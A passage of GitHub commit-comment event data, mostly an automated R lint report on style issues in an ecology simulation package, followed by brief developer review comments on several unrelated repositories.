characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:51:30:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:51:49:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^\n```\n[R/generateArtificialData.R:53:16:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:54:43:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                         ~^~~\n```\n[R/generateArtificialData.R:54:77:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                                                           ~^~\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L56) *style:* **lines should not be more than 80 characters.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:56:27:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                         ~^~~\n```\n[R/generateArtificialData.R:56:31:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                              ^\n```\n[R/generateArtificialData.R:56:57:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                       ~^~\n```\n[R/generateArtificialData.R:56:90:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                                                        ~^~\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:57:29:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:58:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L58) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:59:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L59) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:63:11:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L63) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n          ^\n```\n[R/generateArtificialData.R:63:58:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:65:14:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:65:62:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:66:11:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n          ^\n```\n[R/generateArtificialData.R:66:58:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L69) *style:* **lines should not be more than 80 characters.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:69:26:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n                        ~^~~\n```\n[R/generateArtificialData.R:70:33:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L72) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n"}},"created_at":"2016-09-20T19:14:49Z"}
{"id":"4591837612","type":"CommitCommentEvent","actor":{"login":"jim80net"},"repo":{"name":"pivotal-cf-experimental/basic-env"},"payload":{"comment":{"id":19102337,"position":null,"line":null,"path":null,"commit_id":"f040c23a1bba87c99b246b08b050b66ca2af5903","created_at":"2016-09-20T19:15:22Z","updated_at":"2016-09-20T19:15:22Z","body":"WHY"}},"created_at":"2016-09-20T19:15:22Z"}
{"id":"4591839131","type":"CommitCommentEvent","actor":{"login":"terminalmage"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19102340,"position":null,"line":null,"path":null,"commit_id":"6aedccff67daca9a593e17a0df3188fde030e339","created_at":"2016-09-20T19:15:38Z","updated_at":"2016-09-20T19:15:38Z","body":"Please calm down. I'm backing out the failhard change. I happen to be working on something else right now and plan to get back to this after."}},"created_at":"2016-09-20T19:15:38Z"}
{"id":"4591840557","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"apache/jena"},"payload":{"comment":{"id":19102347,"position":77,"line":328,"path":"jena-arq/src/main/java/org/apache/jena/sparql/core/mem/DatasetGraphInMemory.java","commit_id":"2610908744464e1247b2896f7b26e78cadf56d84","created_at":"2016-09-20T19:15:54Z","updated_at":"2016-09-20T19:15:54Z","body":"Where is `promotion` coming from? I can't seem to find where it is calculated...."}},"created_at":"2016-09-20T19:15:54Z"}
{"id":"4591849554","type":"CommitCommentEvent","actor":{"login":"IIvec"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19102371,"position":null,"line":null,"path":null,"commit_id":"21c5a51947a35cdba9bece35093b7dc32f621d1c","created_at":"2016-09-20T19:17:31Z","updated_at":"2016-09-20T19:17:31Z","body":"Good luck with this. You are trying a difficult thing."}},"created_at":"2016-09-20T19:17:31Z"}
{"id":"4591849696","type":"CommitCommentEvent","actor":{"login":"pwalsh"},"repo":{"name":"os-data/eu-structural-funds"},"payload":{"comment":{"id":19102372,"position":123,"line":123,"path":"plumbing/bootstrap.py","commit_id":"a2da73168c29aa4af5f59986de77993339f87a58","created_at":"2016-09-20T19:17:33Z","updated_at":"2016-09-20T19:17:33Z","body":"I'm not a fan of multiple conditional returns in general, and would recommend to set a variable here and just return that variable once at the end of the function body.\r\n\r\nSomething also bothers me with the three different `raise` occurrences in such a small function too, but in reference to what is happening here it is probably ok."}},"created_at":"2016-09-20T19:17:33Z"}
{"id":"4591851790","type":"CommitCommentEvent","actor":{"login":"jinglebot"},"repo":{"name":"jinglebot/frontend-nanodegree-neighborhood-map"},"payload":{"comment":{"id":19102376,"position":null,"line":null,"path":null,"commit_id":"04c26a66d6e7fedcd3f918b86bc52e324ce7d3e2","created_at":"2016-09-20T19:17:54Z","updated_at":"2016-09-20T19:17:54Z","body":"Remove $data on <li> data-bind"}},"created_at":"2016-09-20T19:17:54Z"}
{"id":"4591852348","type":"CommitCommentEvent","actor":{"login":"irvinemd55"},"repo":{"name":"irvinemd55/about_me"},"payload":{"comment":{"id":19102380,"position":null,"line":null,"path":null,"commit_id":"8b6048a367ed3c5db5f403dbe58b1039b9bc1062","created_at":"2016-09-20T19:18:00Z","updated_at":"2016-09-20T19:18:00Z","body":"Day 2 project first commit"}},"created_at":"2016-09-20T19:18:00Z"}
{"id":"4591855838","type":"CommitCommentEvent","actor":{"login":"wheresmyjetpack"},"repo":{"name":"jarun/Buku"},"payload":{"comment":{"id":19102387,"position":null,"line":null,"path":null,"commit_id":"425e825333073388d3e3f6cf4245aede22f3b0af","created_at":"2016-09-20T19:18:33Z","updated_at":"2016-09-20T19:18:33Z","body":"will do"}},"created_at":"2016-09-20T19:18:33Z"}
{"id":"4591857655","type":"CommitCommentEvent","actor":{"login":"tdwalu"},"repo":{"name":"tdwalu/rbnd-roobiedocks"},"payload":{"comment":{"id":19102391,"position":null,"line":null,"path":null,"commit_id":"968c6cae463d083475a1d026fe7e4cfb23d542d4","created_at":"2016-09-20T19:18:53Z","updated_at":"2016-09-20T19:18:53Z","body":"I have finish but code is not coming out. "}},"created_at":"2016-09-20T19:18:53Z"}
{"id":"4591860420","type":"CommitCommentEvent","actor":{"login":"gaojq"},"repo":{"name":"djfinn14/Dan-Dennis-Homework1"},"payload":{"comment":{"id":19102401,"position":null,"line":null,"path":null,"commit_id":"9d29616b41a22c4f81c9fe03a67b4f56a1dd2164","created_at":"2016-09-20T19:19:20Z","updated_at":"2016-09-20T19:19:20Z","body":"[README.docx](https://github.com/djfinn14/Dan-Dennis-Homework1/files/483448/README.docx)\r\n"}},"created_at":"2016-09-20T19:19:20Z"}
{"id":"4591861062","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"apache/jena"},"payload":{"comment":{"id":19102402,"position":77,"line":328,"path":"jena-arq/src/main/java/org/apache/jena/sparql/core/mem/DatasetGraphInMemory.java","commit_id":"2610908744464e1247b2896f7b26e78cadf56d84","created_at":"2016-09-20T19:19:28Z","updated_at":"2016-09-20T19:19:28Z","body":"Never mind-- I found it."}},"created_at":"2016-09-20T19:19:28Z"}
{"id":"4591861475","type":"CommitCommentEvent","actor":{"login":"YaqiWang"},"repo":{"name":"idaholab/moose"},"payload":{"comment":{"id":19102403,"position":17,"line":35,"path":"framework/src/base/ComputeResidualThread.C","commit_id":"d1664146a4a9f03c125ecd0c2356ebebd0389058","created_at":"2016-09-20T19:19:32Z","updated_at":"2016-09-20T19:19:32Z","body":"can use `_sys` here because it has been set."}},"created_at":"2016-09-20T19:19:32Z"}
